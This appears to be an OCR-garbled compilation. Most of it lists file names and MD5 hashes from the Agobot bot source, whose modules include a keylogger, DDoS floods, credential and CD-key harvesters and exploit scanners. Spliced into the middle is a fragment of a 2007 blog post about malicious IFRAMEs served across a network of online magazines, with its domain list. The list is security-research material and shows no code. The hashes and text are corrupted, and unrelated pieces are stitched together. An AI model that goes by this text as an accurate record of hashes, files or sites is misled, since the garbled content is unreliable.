global.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
md5.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
md5c.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
global.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
md5.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
md5c.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
global.h.svn-base 
650888a1590d495c8dcc59569f6839a0 
md5.h.svn-base 
92bc91ca9f387209188fa316a4ab9405 
md5c.cpp.svn-base 
7023d118e4970f3630d9aa0acdd0f6b4 
ddos.cpp 3e0fe54fb42855044cf612af7b75f4b2 
ddos.h 
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9cc7e6a54772fd73bedcbe8376720df3 
3dnow.h 
ef0d7947ea3fbee875166d804c4db2d7 
acinit.sh 
1e017bb852d4caddedad8e98d29fab2b 
agobot3.aps 
f8e9a55a137636be61068c9418331871 
agobot3.dsp 
ae6b66b694e09b87319b5bccb862967c 
agobot3.dsw 
686cec5337decb5dcé6ffc42c42d22b72 
agobot3.ncb 
b43b658381111942167ef3ca31758ba5 
agobot3.opt 
ff9644d21a8ff9aed3525bb232ad49f6 
agobot3.plg 
fabf4c2876c871bd266998f09a869b54 
agobot3.rc 
cb408ea8df789821eba4c5fd16fc5222 
apl.txt 
9b12255be30584c0bbc557a979d6cc8a 
baglescanner.cpp 
064e394ed56f472b7880115b704c9517 
bnc.cpp 
b05e59f8949185329c9e766178406ada 
bnc.h 
3e363b7f642eaec93fc5d71853208aaa 
bot.cpp 
49ad89bb0a4fc3e7 708bbde5e9f56007 
bot.h 
ff4622c62ca3e71c7b429ce4797ee81f 
build.h 
2a79b76430b78de84db3bc7a52467d94 
build.sh 8b31bela8df400238be149cbb7a335e5 
changes.txt 
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a8e8fca3c583d8ee3d4add643ec159f4 
cmdbase.h 
26db6f0199a8036b090e9dd00e316475 
cmdline.cpp 
7d1782f3bb300e6459f21009c834d999 
cmdline.h 
3b94e2abdfab9092000d46070f96384d 
cmdopt.h bbf99a918d54f3af9b8b8d3749f6d64e 
cmdshell.cpp 
953cc900136d6f2d122fe33ccf3fdf3e 
cmdshell.h 
5132962f81afb08c619e63298d108b4b 
commands.cpp 
862e80e6357cb358233d6298ff4cfb68 
commands.h 
d2ff39fc872264615767405edf0c7644 
confbase.h 
038be6f457b7781065a26046e444199a 
config.cpp 
782187372036e17acdcb869ae3489f1c 
config.def 
beab7a34aefdbeab8888ee648d727e56 
config.h 8506f9100d9b4a6df7a6d59c11a3c263 
config.h-bck 
9523505d47092d4aeab3423bf7fffl4e 
configure.ac 
1ad14693fb6236abc46410b4bal1laf75 
consdbg.cpp 
0899cf84bec533368494296b8c224041 
consdbg.h 
8ae2f94dc08f997f066f04b4be998a39 
contrib.txt 
8399972deefe0714e2e7020ee2808a35 
cpanelscanner.cpp 
ea2ade5483e8cbfaa538238596ddbf27 
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cplugin.cpp 
fd03a3cd1bfb177f92790d61b45b27b7 
cplugin.h 
f74efd5d9d520ca42e4b914c62ae51e5 
crypter.cpp 
belac4b3907cfd557446f6f48b97f8el 
crypter.h 
6730cee1c317ba2de7fa21f5db91c5ae 
cstring.cpp 
ab535cebbb99fe3b2534cce5479b4eld 
cstring.h 
f0260dc41d01ecc8a7fe51f9b03ca899 
cthread.cpp 
51fa642eb94650b4fc151c2b370928ba 
cthread.h 
f4cc50f8156bacd685927a8c9bfOOdff 


cvar.cpp 41d04f9299ea3c2bf6b318574ab92a9e 


cvar.h 
d8b65a8922a79283e93f92898a00e179 
dcom2scanner.cpp 
ee834dc4b2fcc79a94a717c2f34b58b2 
dcomscanner.cpp 
a601737b5e04b0101d5af5e0bf4ea4cd 


ddos.cpp 1df4c16e7375d1d9a8774e137cdc27c2 


ddos.h 
bOfbc4b1e592c0aee067257e034c05fe 


debug.sh e69abc2d15e984622252df96cd1d81al 


disclaimer.txt 
e8ce5f964cb192fb125cle27ee8667d5 
doomscanner.cpp 
d926dfc92b9080f51616bb28b6d4f9ed 
dwscanner.cpp 
6984690a768b1a4fe5426ad443aab6ea9 
files.txt 
4be03c19d6bd1db6c47648ef2302e768 
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gh3tt0.cfg 
61la2cO08d4ecb6fcb4403f3b5dbe27e743 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
harvest _aol.cpp 
43888ffd67e66686c05a9aeb8246cd12 
harvest _aol.h 
5ca26566806fd76c617804a53601047e 
harvest _cdkeys.cpp 
831234fb974594873dd572aa2ee40557 
harvest _cdkeys.h 
e8dfebb220744d05cal17c194c844b581 
harvest _emails.cpp 
6376b06a85ee76c19b9d193dfa0425bf 
harvest _emails.h 
041a05b157a3e79465f9beb0ab6f41esf 
harvest _registry.cpp 
4b55b4f5d325e22948a67a95aa0e4724 
harvest _registry.h 
54f4301af575ece7b020334a57d044f0 
hook.cpp d0a4ea071585ebf86807cc2fb44cc7 7c 
hook.h 
81692cbbcbda33288e764fcelcelaebe 
httpflood.cpp 
47a467c7a9396291386ed253e74f05a8 
installer.cpp 
€9545b46c237840aa8472751c301e49f 
installer.h 
ff4e2db0555056db3877c4684c2be716 
irc.cpp 
5318814ddb06a8509ca81b0b9f41d73b 
irc.h 
c0633bd4dd91dcee577395e89062d9f9 
ircgate.cpp 
4f9371216f50179ed46648dfb9883f37 
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ircgate.h 
80cb8943ae899d87d9eb2989fc8445de 
jz.h 
68d8a7c8bf58c9d0f62d820ba3e941F3 
keylogger.cpp 
6045a9cecba96230b1baf5d5653f92a8 
keylogger.h 
9575488bbd240f7f54e3a2dbdac9bee9 
locscanner.cpp 
4fbd88f4e057781c638c6f93979adf4c 
logic.cpp 
85f9flfb4ef3a4al17e6c157282c43d92 
logic.h 
97bf6F73e66021dc10233e562a67ff0d 
Isassscanner.cpp 
736237b6fde99553d25448eab6354168 
mac.cpp 
82ed2ff3be4377a0798dd32d56d33d94 
mac.h 
3608d7d46c2686ef969d6dd0034cala3 
main.h 
b7917b5ab3fe49f869 7 3f029bc2f8723 
mainctrl.cpp 
e110f18e5085ac72c9cc8b21faae055f 
mainctrl.h 
c61fb9e0c348d091e1bb76fc00f25935 
Makefile.am 
1bcb97a0ad767110ffffOef2a821f1a0 
message.h 
816b1b7d84db1960642f44e2655c180f 
nbscanner.cpp 
cd012737de95901a0d9e01e0abe156c9 
optixscanner.cpp 
343ed157bf732caf0e612f1d19c53501 
p2p.cpp 
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9df216f299c4caf71d74f9e1a50a5181 
p2p.h 
33cf9dacal4ed6dcef8ffbd0051680c9 
phaticmp.cpp 
fa561638fb1c540a7cd9d02ce359db68 
phatsyn.cpp 
cf3eb65b0c905c53fefceff34cb49418 
polymorph.cpp 
d07be979821c55376747cc4b04a70c5c 
polymorph.h 
cael70a59593ffacab3a898962c6lalc 
radminscanner.cpp 
a3d568133b0d3b8ec9f2ef5dfa4eb993 
radminscanner.h 
91c40f3194d4d538828cbf3acda/da84 
random.cpp 
d5cc1078d40a30a000cfb5eb59dd28d1 
random.h 00ad1b05e533694170f55f688ac05422 
redirect.cpp 
3ca639c16dfb7f57822b63c370108d5b 
redirect.h 
ae0c1600455a650f26c104e2f273cd88 
redir_gre.cpp 
61452279b79645e5ff97f7af22792401 
redir _gre.h 
b143aaac61fc480e928eccf326fe8ce7 
redir http.cpp 
fe8c2cf0f09dc51bd0173d5ee89bcf02 
redir _http.h 
58668d006562809f0ccda593d52f9e01 
redir https.cpp 
db42cf926b9d23921bfc781e941476ea 
redir https.h 
5829e683434a34aec3024c15bb84201d 
redir socks.cpp 
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d69b14bf63c7e52c5662614e44e80f9c 
redir socks.h 
82¢c432c3f3e94eab48c3d156dd3506d7 
redir socks5.cpp 
c9c087412eefd39bf62442043db32d55 
redir socks5.h 
9f2ba54f64917283ba200cabf71028da 
redir _tcp.cpp 
a25e7ca6f764137a1la7568c007f90292 
redir_tcp.h 
a6d756ba1620cf70a5eee22f03b01640 
resource.h 
2b7b383879fa48367201leb6efcd93164 
rsalib.cpp 
3def23fc50249e85de2ae388cc5bad45 
rsalib.h c22210651c07e4ad2a5241067f56c3al 
sasserftpdscanner.cpp 
75362c9eb6d4c21462c545a0c9bc9581 
scanner.cpp 
0748467109b1d161175da29ccdd655e9 
scanner.h 
4c3c75b9a9bbdc9800350a926a05aaa6 
sdcompat.cpp 
ce75e8ac16f1b8956ab361e43ae6e2fe 
sdcompat.h 
e3d3c73c697cab97599aa3f440f09de9 
shellcode.cpp 
a97cf083ac67a9e3a09006272bedf986 
shellcode.h 
756ae88719f7771528a3e7dd6247321b 
smtp.cpp b2aa5cf91a158317e28d102e75c6fccc 
smtp.h 
1¢099aa5c145a45d53f285187688846fc 
smtp _logic.cpp 
3ee04cd6146798521d54cdbd6ad84931 
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smtp _logic.h 
ed0789930b4d55784fdf8012bb39e402 
sniffer.cpp 
45d71fccfb562c83768cb4fab1577a31 
sniffer.h 
264699ee4ecf70dd1c455f171331e14e 
sockets.cpp 
€3997b71b44d8b2b445c79d4c3148ca9 
sockets.h 
19c69764e6be8177595fc88ad44c3138 
source _cacti.sh 
285902740b51c62ac398fa2aff2bfbc3 
source _stats.sh 
70a2f82b621c71859ef9276d9d8bf923 
sqlscanner.cpp 
e9cd20fc5flfec199f1a5255ce51b040 
ssllib.cpp 
93f221ee128029091531fd6c2d359d97 
ssllib.h 7fl2ceefo398cc9dd02ca8209al1e693c 
synflood.cpp 
44c637f068f38111493e30ae6061e857 
targa3.cpp 
1b5d551c73d841111b78aa81e51398de 
todo.txt 4e61212c2c8417efd8fe8345f7fe8411 
udpflood.cpp 
2b97e373b759c3863495b48d74bba7d6 
upnpscanner.cpp 
dae481938356734e01b2d3ec3de64dc0 
utility.cpp 
868376c67e4909f4a4638a6544d44d35 
utility.h 
a0fc7347def3d49748dc3db1c5ed1f54 
wdscanner.cpp 
ee2ab8ae6bd716942ff34636a51b22a0 
wksscanner.cpp 
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3.10.28 A Portfolio of Malware Embedded Magazines (2007-10-25 13:18) 


? =) ry 


PARTNERS ComTact us PUBLICATIONS ABOUT US 


GM 


Computers are useless They can only give you enswers -Pablo Picage 


Extraordinary Concepts - Extraordinary Results 


Welcome to GM Media Worldwide 


GM Mectia Workiwicie Inc. oo provetely hell company, beatqeertered in Mee, Pl We own nad operate 
several echsckgy pobbcatoe sad wed wes comriag to the Oloted Service Prowsder morbet om wed a other 
pobiconces ond web ures for gecinkard marke 


Fer » ie of the pubicotions and web ses choore from the emigeion ber stove 


This is perhaps my most important discovery of [1]malware embedded sites farm in a while, 
at least in respect to the potential impact it is currently having on the unprotected visitors 
browsing the sites of Possibility Media’s portfolio of online magazines, which are pretty weird 
content by themselves. Possibility Media’s (now owned by GM Media Worldwide Inc.) 24 
online publications are currently [2]serving embedded malware in the form of IFRAMEs on 
each and every domain, a logical development given they’re all hosted on a single server 
(216.251.43.11). The affected domains include the following e-zines : 
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22fa0efe83albbcbe20febf5a7a252fa 

wonk.cpp 8e6411da4caed15ec5bcc47e18a946b6 
configgui.clw 
3fc58cb535bd0fad5f0499fdcbc4f693 
configgui.cpp 
a57289a82f52ff8704b7f9be23376569 
configgui.dsp 
9d0a5024d4d9f13268a78a223bc285c2 
configgui.h 
e0bd7f1a46243179af640ea05a62b464 
configgui.plg 
dba27f2fa9be201557326184633e987c 
configgui.rc 
6849f1b40133e366187073b963fc4a4f 
configguiDlg.cpp 
730563830e78fb991703187c509c722d 
configguiDlg.h 
68efOffOe68c5ee7935056caf57dflae 
resource.h 
0856ff351c84a8c6794b08f07e2e0c3b 
sapphire.cpp 
67a6b4fd1334cc329193a8b89e27abbd 
sapphire.h 
62c2a91d677baf965bbb8518ac067ce3 
StdAfx.cpp 
614907522fd5ad4768868cd662362f40 

StdAfx.h 33c74abca38b057e0d34b66207609ddd 
global.h 650888a1590d495c8dcc59569f6839a0 
md5.h 

92bc91ca9f387209188fa316a4ab9405 
md5c.cpp b97c74cfa3ff6169a83db0530b6155bf 
bool.ico 33aacl8e4282ac8dc8f42accbc64f4if 
char.ico 7f48726950191ca3f97d850c6a2ee5f2 
configgui.ico 
ee65972d6535bfafaf3b6b64fa0a2892 
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int.ico 
a853cafc8711f2b65b8a9793a390dbfc 
string.ico 
1583133be23045bdeefa8eaf2aca3210 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
sample.cfg 
7459d1ce1d4a89434a2246b1f3bab6ec 
Agobot.png 
d7d30d0cfec088f0072301103c8e2ab4 
agobot3.jpg 
a137ca64758c9a0819b8887091e4e735 
agobug.jpg 
8480622e98fbaff360233ed8b1f2b8df 
commandref.html 
fd30868df0bd75ac3596213ccb9b00ed 
Executables.jpg 
dd889a5bf52101b74195ee848735e5c5 
faq.html 18772ffe8416a4eb9eb176c39d67849f 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
history-icon.gif 
7f42e80bf06c3fc688419e03da324991 
Includes.jpg 
cc535d6be714bcalffb151dad1b09817 
Libraries.jpg 
9dc6ba5a519dbb8b57d73fecbal0fa62 
rules.txt 
fel7a6f3dcc1b9850acec9ab1d98d191 
Thumbs.db 
02d9567b6920e1b1e9989bfe7f348163 
Command Reference.htm 
2e8bbe015b0cfbf934155f34ec96525e 
FAQ.htm 
541e7a64b64fc8042a22c67458e10e3c 
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setting.css 
a8009d70a43172d23628edfb3791066f 
empty-file 

entries 
df8fd14d6dd4515e36fd476fb50b3067 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
Command Reference.htm.svn-base 
202977d1c96f487abe4ale202dd03b4e 
FAQ.htm.svn-base 
202977d1c96f487abe4ale202dd03b4e 
setting.css.svn-base 
202977d1c96f487abe4ale202dd03b4e 
Command Reference.htm.svn-work 
202977d1c96f487abe4ale202dd03b4e 
FAQ.htm.svn-work 
202977d1c96f487abe4ale202dd03b4e 
setting.css.svn-work 
202977d1c96f487abe4ale202dd03b4e 
Command Reference.htm.svn-base 
2e8bbe015b0cfbf934155f34ec96525e 
FAQ.htm.svn-base 
541e7a64b64fc8042a22c67458e10e3c 
setting.css.svn-base 
a8009d70a43172d23628edfb3791066f 
1L.gif 
b47b8bb2d9d2363f5e44543207a0d161 
2.jpg 
7593f04b42ae8c3fad5d670cf99c752d 
3.jpg 
f36f233fdcaf0120ae2fd7bOdf7f060F 
4.gif 
b6485aab665affel1l86cac24aef9895d9 


11365 


Executables.jpg 
dd889a5bf52101b74195ee848735e5c5 
Includes.jpg 
cc535d6be714bcalffb151dad1b09817 
Libraries.jpg 
9dc6ba5a519dbb8b57d73fecbal0fa62 
Thumbs.db 
2b5c781e370dc0b6132b03220a80f7d4 
empty-file 

entries 
67682e0fd2feea78c761fb6147838243 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
l.gif.svn-base 
113136892f2137aa0116093a524ade0b 
2.jpg.svn-base 
113136892f2137aa0116093a524ade0b 
3.jpg.svn-base 
113136892f2137aa0116093a524ade0b 
4.gif.svn-base 
113136892f2137aa0116093a524ade0b 
Executables.jpg.svn-base 
113136892f2137aa0116093a524ade0b 
Includes.jpg.svn-base 
113136892f2137aa0116093a524ade0b 
Libraries.jpg.svn-base 
113136892f2137aa0116093a524ade0b 
1.gif.svn-work 
113136892f2137aa0116093a524ade0b 
2.jpg.svn-work 
113136892f2137aa0116093a524ade0b 
3.jpg.svn-work 
113136892f2137aa0116093a524ade0b 
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4.gif.svn-work 
113136892f2137aa0116093a524ade0b 
Executables.jpg.svn-work 
113136892f2137aa0116093a524ade0b 
Includes.jpg.svn-work 
113136892f2137aa0116093a524ade0b 
Libraries.jpg.svn-work 
113136892f2137aa0116093a524ade0b 
l.gif.svn-base 
b47b8bb2d9d2363f5e44543207a0d161 
2.jog.svn-base 
7593f04b42ae8c3fad5d670cf99c752d 
3.jpg.svn-base 
f36f233fdcaf0120ae2fd7bOdf7f060F 
4.gif.svn-base 
b6485aa665affel1l86cac24aef9895d9 
Executables.jpg.svn-base 
dd889a5bf52101b74195ee848735e5c5 
Includes.jpg.svn-base 
cc535d6be714bcalffb151dad1b09817 
Libraries.jpg.svn-base 
9dc6ba5a519dbb8b57d73fecbal0fa62 
template.cpp 
5b79bc5224e467f6c3b9f5e98617fe27 
template.h 
82fc7acb6a5df848e5aef6a285b47c7ae 
template _priv.cpp 
64191de4261fd379442798bcf3bf9191 
template _priv.h 
568395b8514da8e0ab96a77f43d1d397 
ftplib.cpp 
€6198b4a396e299a216d2245d1893 lef 
ftplib.h 1643800fdcb5f8ac02b697172cdd9312 
Makefile.am 


820ccf5ce58507ae7 7638d9f38644064 
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apihijack.cpp 
2fdd99429b54b8c92f1f4caf29cbddeb 
apihijack.h 
30b69595647aa5b77eb52bed2ee419ba 
hookdll.cpp 
8055b4a4d1fb0800771adcf7c87dd1b1 
hookdll.def 
0331893fc8a1539cfd887b938e3d6ble 
hookdll.dsp 
ca3c13a4de68d321ac482d272f8d8e3e 
hookdll.h 
7bbbd7d11dda78cba93df51b061248bd 
aes.h 
8a1683380fb6c7e47a030441deaa9729 
asn1.h 
€4850551747c3ed416e8e5912963a62b 
asnit.h 
€6a598b009998a52d94e8e23ec42bcea 
asnl_mac.h 
264e30baae9e0496c377fdb46bd76ec5 
bio.h 
7e9e00b976bcca0dbeOc5ac39aca085e 
blowfish.h 
lab86bb515bf5ae668b7e90088c6a9b1 
bn.h 
ad6c7b0a04730a5c25394bd0c54a5b38 
buffer.h 21739839605552fe7e26e518ff9d1726 
cast.h 
2ef7cdf43ec57b9576a79132cd9e60dd 
comp.h 
d0a8fcle7ffad7b62cb42d060dea5498 
conf.h 
60ce42bc8dd8cdd49c82c1fb7ce7b560 
conf _api.h 
cc278b01a46afa4b6e8d5815ae9b3ff9 
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crypto.h 69252e3ea530558f9f5734ab29c05625 
des.h 
b69b415fea5fb1bf6c58594e8f58a8bb 
des _old.h 
a24a9529e2d665ea6a8fa017f817b048 
dh.h 
ae591cea504a73felf3b2a4380d06ace 
dsa.h 
675ea37e450f77a6d50c9c63d108a20f 
dso.h 
574c270a17ca4d137e209147fef318c1 
ebcdic.h b39613d8ce01e224ae72baa0246892e7 
ec.h 
af60f7d3bb2933507cc4d8340b5adeef 
engine.h e4704be8f464501e5075d53cd3e5116c 
err.h 
6b3a5cc47a70d80247983fb231fe9904 
evp.h 
f410591d316b94da695e4188067372fa 
e _os2.h 
9831a4698c1lefa3423a42ff6658c6e9d 
hmac.h 
0d4075c5234bb8c120ecddd42a7506e6 
idea.h 
11036b66c5daae8331bfea7b1f68f839 
krb5 _asn.h 
89938e61379604ad75250e27be1295d1 
kssl.h 
cOc4a8aee2a634536d852ea56a2549a3 
lhash.h 
d3fdb40fd99f5ccdb07a733a12ed96ec 
md2.h 
0d832d08dbf750f4b5b1a6e85b2694F7 
md4.h 
5f556c7abf2e93aff8d62214d8553836 
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md5.h 
17ab334f97c23505bf86db95b3ee4dd7 
mdc2.h 
€696ba21a731dd394dab76d069d7 1f0f 
objects.h 
230dc0751584fd68351f30b76b5bd308 
obj _mac.h 
3ae222ed06e67fba0087c9061d9b7333 
ocsp.h 
6c3ea1b1012393662937ffa70ae53102 
opensslconf.h 
720fda36ac4474e671189001542c2bd0 
opensslv.h 
57e60b1369bf20c9c57ed3a9ac4a4ecd 
ossl _typ.h 
81e2aa843c6d727215cc0a2369c0f79e 
pem.h 
77073bb9f19641¢c74a719dc8842c364d 
pem2.h 

2aee9bcf129f9962f3 afaed608385850 
pkcs12.h d478d67367a55d13f65baa386a8bb3d6 
pkcs7.h 
4dd06c63aed91c87cdf0e958e5361068 
rand.h 
4c799ae5454d1518c240698bf6013366 
rc2.h 
d9db99c50697d831e283caaf350c53d1 
rc4.h 
79f8877025abe51lae6dd9227ac46db72 
rc5.h 
c53e0eb333a8e90823f89850e77d00fc 
ripemd.h 3c985af288445d3c916c8b9056f820e3 
rsa.h 
bdbba4e0d5d90911f3224ff32a991756 
safestack.h 
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d853650638876fa887e90f9d447147a9 
sha.h 
4d221d6261d195a9940ec97f1c680319 
ssl.h 
7f88070dec9b8133198fc29b1d45f436 
ssl2.h 
79f783feecf62b2c93432d680f117f08 
ssl23.h 
71ae764cc97086829353194e4d9ff2e9 
ssl3.h 
fe1284ae50342eb9b3d3f4370a70a61d 
stack.h 
81e9f97755996e1711e81aac115a33bd 
symhacks.h 
29231822cea986c1da4860f1353c3419 
tls1.h 
ee9d200fefd5e73c10e7a82d050c9aaa 


tmdiff.n 8b6b6f8df660f682d29b153cfe760674 


txt _db.h 
0211lad13eebb398e05aed4a0aff1175a 
ui. 

a663610e2ea97 6be0925fcla7f80b09c 
ui compat.h 
279bd1f134aeccff4ebfc039a85917dd 
x509.h 
e30e0a21a37046526d5e18b44552c0c6 


x509v3.h 2cb299c4a5bbd956d95c0b3d292d0ec0 


x509 _vfy.h 
62f83ce9ddb79685efdc13f26b686cl1f 
libeay32.lib 
6ffdb29d7741b656f794cbfb2d7931f9 
libeay32D.lib 
100f2d78dbf5103296153c280c3b4561 
ssleay32.lib 
fo512a7b4e96fle4dcb56a5b64018a0a 
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ssleay32D.lib 
526e2d5cc43300d4a0e8fc2e50f4b0eb 
global.h 650888a1590d495c8dcc59569f6839a0 
Makefile.am 
bf07e9cc53015ef68fe01c9600a107a6 
md5.h 
92bc91ca9f387209188fa316a4ab9405 
md5c.cpp 7023d118e4970f3630d9aa0acdd0f6b4 
mods-readme.txt 
435c463d873b54ceb9aed44f7d628bc3 
quick-commands-list.mrc 
9171b6df53e3016deb520d24737818d8 
sniffer.cpp 
74557fc0d9227d3b1ff27b8df07e2d82 
shelltest.c 
9faeca03cc9cd2900cbc3720ae7cOfb5 
shelltest.dsp 
41a5e461a97d18c5e376d2da98294a6d 
shelltest.dsw 
4f587ee0e8990193d01b52e56e23ec16 
shelltest.ncb 
2536b97a9242f716ddfb75e7365fed2c 
shelltest.opt 
6b68270677158df7922e607ae6acf6439 
shelltest.plg 
5ea89f4b1413ea075050ff2c08016505 
3dnow.h 
d9100dd39e68cfc2749d8fa10ab97988 
a.cfg 
71da5166f07d3cal163ee5e03713f0661 
acinit.sh 
1e017bb852d4caddedad8e98d29fab2b 
agobot3.dsp 
65a803b8f5488b304c024763e09f781e 
agobot3.dsw 
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NM MH ify 
— oie 
a nia 


JN 
— 


t 
— oe 
DOaaannn a 


cO.megawe 
hostingcO 
hostingcO.megawe 
hastingcO.megawe 
hostingcO.megawe 
hostingcO.m 
hostingcO.m 
hostingcO,.megawebse 
hostingcO.megawe 
hostingcO.megawe 
hastingcO.megas 


‘workweekmag.com 
portablecomputingmag.com 


businesscomputingmagazine com 


communicationsworldmag.com 


eekmag.com 
veeklymag.com 
itweekmagazine.com 
communicatio kmag.com 
ipworldmag.com 
networkweekma g.com 


hostingcO,.megawebservers. thebestpemag.com 


> 
< 
? 
2 
24 
< 
> 
< 
2 


hostingcO.megawe com technologyweekmag.com 

hostingcO.megas ry! om theinternetstandardmag.com 

hostingcO.megawe .com securitystandardmag.com 

hostingcO.megawebservers.co theitstandard.com 

hostingcO,megar y ‘ enterpriseweekmag.com 

hostingcO.mega e .com computernewsmagazine.com 
theinternetstandardmag.com 

hostingcO.megawe 

hostingcO, megawebser 

hostingcO.megar 

hostingcO.megawe com serviceprov 

hostingcO.megawebs .com -ekmag.com 


networkweekmag.com - Network Week Magazine 


portablecomputingmag.com - Portable Computing Magazine 
businesscomputingmagazine.com - Business Computing Magazine 
communicationsworldmag.com - Communications World Magazine 
spweekly.com - Service Provider Weekly 

webweekmag.com - Web Week Magazine 

pcnewsweeklymag.com - PC News Weekly 

itweekmagazine.com - IT Week Magazine 
communicationsweekmag.com - Communication Week Magazine 
ipworldmag.com - IP World Magazine 

networkweekmag.com - Network Week Magazine 
thebestpcmag.com - The Best PC 

technologyweekmag.com - Technology Week Magazine 
theinternetstandardmag.com - The Internet Standard 
securitystandardmag.com - Security Standard 

theitstandard.com - The IT Standard 

hostingweekmag.com - Hosting Week 


enterpriseweekmag.com - Enterprise Week 
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0ab12eaa257fd9304b15309ea9c85849 
agobot3.ncb 
€2322a40abc9c8d5d3c082e789e41fle 
agobot3.opt 
3384a82e547c43bcc85f57c65d367cbe 
agobot3.plg 
d47de8d1fd0a7a888be95481b112f955 
anubisscanner.cpp 
f84db8bbc9b015cab6b3f0d656fc734b3 
apl.txt 
bd595566bea4b6d20a7fee3cfe4970b8 
asmstub.in 
1f2b44aa136609f4356736ef92celcd7 
asmstub.obj 
fddcedba70927a6c85e3elb86abeaa3c 
autoexp.dat 
e55f8a99f4d2b87fc15269fe7b4efb3a 
baglescanner.cpp 
6bf6060d712efd6e0c33f23ffe96e26c 
bnc.cpp 
497c564647d3fea376ecOca3f8cc5f3a 
bnc.h 
f8eaaeb981048c77ddc81750b141f1d5 
bot.cpp 
587e268bf6d00229524d70d9a725abda 
bot.h 
41e031f782d6995ae6abd7737dcf09a4 
bothooks.h 
9736c53c7f051641ccOdccf88012cde5 
build.h 
6970bccb1le6d97cb5de8f6b27add8515 
build.sh 054e212d0a9f00f577d7f94aeb9f5fad 
Build All.cmd 
be003f83567a3f7cf88de32eb616f3b3 
Build Debug.cmd 
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593545b861c49c1add43b61786819406 
Build Debug _Internal.cmd 
932b46f158149fc658179e86fc60d40d 
Build Debug _NoSSL.cmd 
60569f903bb4a538fc526e9f5aeb5f59 
Build Debug NoSSL _Internal.cmd 
a22fa883bfa817ab46fa8cb8cdf9312c 
Build Release.cmd 
d0f6b3204f453c3f02aac6a57c421a92 
Build Release Console.cmd 
1e9f126b7ef8a36be7677593db83396F 
Build Release Console NoSSL.cmd 
57526c3073a21ce623ad9fbe385e9b65 
Build Release Console _Test.cmd 
d359f46e1180780057fcea4ec6a4757e 
Build Release NoSSL.cmd 
c22251bcd7720ee61686a3cdeba7b3ae 
changes.txt 
e653cebced8f1c674392552c64564413 
CleanUp.cmd 
9bf934ba74279402600677079da2639a 
cmd.h 

cmdbase.h 
bf54f98538a921b69ba4490e17f2b8fe 
cmdline.cpp 
ee0536e1778f249ac6d70c32b841d6afr 
cmdline.h 
897a56611e00062c7c496b81fd4b4854 
cmdopt.h 184a8a40e4a3b9a0bbe00bfd2f549612 
cmds.cpp 

cmdshell.cpp 
9a4de5d5daae2350bab7a73006fee499 
cmdshell.h 
3440832974ab65458a9042c06563a657 
commands.cpp 
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13e47b2eddf80f5d988a6f7f80b2cbd3 
commands.h 
1b8ff37e5d64f42ac787adecfal47ce3 
confbase.h 
038be6f457b7781065a26046e444199a 
config.cpp 
c037a10534c83ab566ddfc639a4dddba 
config.def 
3a731009b0357fa3d6fe19e33751f39Ff 
config.h cf55034cf7a889f107ea6ee94738810F 
configure.ac 
58c33f65f7deb91a092bed20c724ee48 
cpanelscanner.cpp 
2b812b204a582b0080bbebc3aebe0cc0 
cplugin.cpp 
50c1f82216b8f1b3332317751552ac6a 
cplugin.h 
87ca2b9dfa33e3242f8f26b7f212b72c 
crypter.cpp 
95f7a9b965b3008099a98fd0ec322404 
crypter.h 
8bb601e770c162436dbd8c1840a37191 
cvar.cpp afd69e6423b1dc3576b55aaebdd9609a 
cvar.h 
3f9e0e7961fdad67f5debfb314559cc0 
darksys.cfg 
5bc951dcfd39eed9a720918aclafldb9 
dcom2scanner.cpp 
95cdaa7bc55fef830a11b42db6450ae4 
dcomscanner.cpp 
9a7d5f0b5303244cf607370bd0a19182 
ddos.cpp 7214002dc3347ce10716f040c3a0f84e 
ddos.h 
0b6332d2c7f29264fb5934c8ce00adf82 
debug.sh d8c0d948c2de78f402edf0ccbf82129c 
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disclaimer.txt 
e8ce5f964cb192fb125cle27ee8667d5 
doomscanner.cpp 
836c200e32db56c9f3637660f3223ea8 
dwscanner.cpp 
65e22bf0ee7e2ad02edb37894bb0fe3e 
etherealscanner.cpp 
19c8f4afebe397748903e3b32d5b380d 
files.txt 
ba724b897d447980a6ee803e695628f3 
fuzion.cfg 
b4fc08947d9648fdc49be661eb81bdd0 
harvest _aol.cpp 
c708182e01724c03df1f61982dd532b9 
harvest _aol.h 
0034d8101ab802c3ab05eb11a4e920f4 
harvest _cdkeys.cpp 
70a2a4e9cadc1bde007208b3fcef6755 
harvest _cdkeys.h 
a816c50eb1d8b648360fd1bf84b45fce 
harvest _emails.cpp 
e2ab28cc70580dcal0f1272461d0143a 
harvest _emails.h 
9d7e0fec91404b7d73dcf6fa8c93189e 
harvest _registry.cpp 
ecc09878a678a1b72e01665250196ea0 
harvest _registry.h 
2557fde542f4f08a9a024efeacafa7d0 
httpflood.cpp 
70483c888c16abbc100e2c21b39f7bad 
httpscanner.cpp 
621840b6fdbae06cd0f6dd3a4531a6f8 
installer.cpp 
2e17f4d9bb48650849583c23e2db758d 
installer.h 
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4ce41e849c3fb2810199595ff82fd7a6 
irc.cpp 
88401deacaa8772b8cf21899fabfdefa 
irc.h 
224fc7e35d3b3e4486db931f901f9dd1 
ircgate.cpp 
4f9371216f50179ed46648dfb9883f37 
ircgate.h 
80cb8943ae899d87d9eb2989fc8445de 
nasmw.exe 
caebe7102d757b54blad99f8aec513al 
avkill.asm 
c1097957a30d08a8d4ca65c60384f455 
build.cmd 
477bc9743d056491d48c8544e56af1 ff 
agoenc.asm 
9c07dbb8b5239cb91afc002b9cda9515 
build.cmd 
1la2caa3692be0d8b48c70405c1fc9299 
rolloop.asm 
9be29be0c7508b2e7244a0d435977fd6 
rorloop.asm 
705ec2322aa22fb8539e493137486df7 
swaploop.asm 
afb679834283304c5139c92a61532e83 
xorloop.asm 
2ad5ffcbcccf93417718a496bf67c2e3 
xorloop2.asm 
6d0ceeef23fbea9d66d68286c2607dd9 
xorloop3.asm 
b2aa38c74bfcb03a2fe902cfc5c88b36 
agoshell.asm 
60c5f0775f9e5aac0892b3a0803486a2 
build.cmd 
eba8f780f6ea4e3b3d6f133281063c2a 
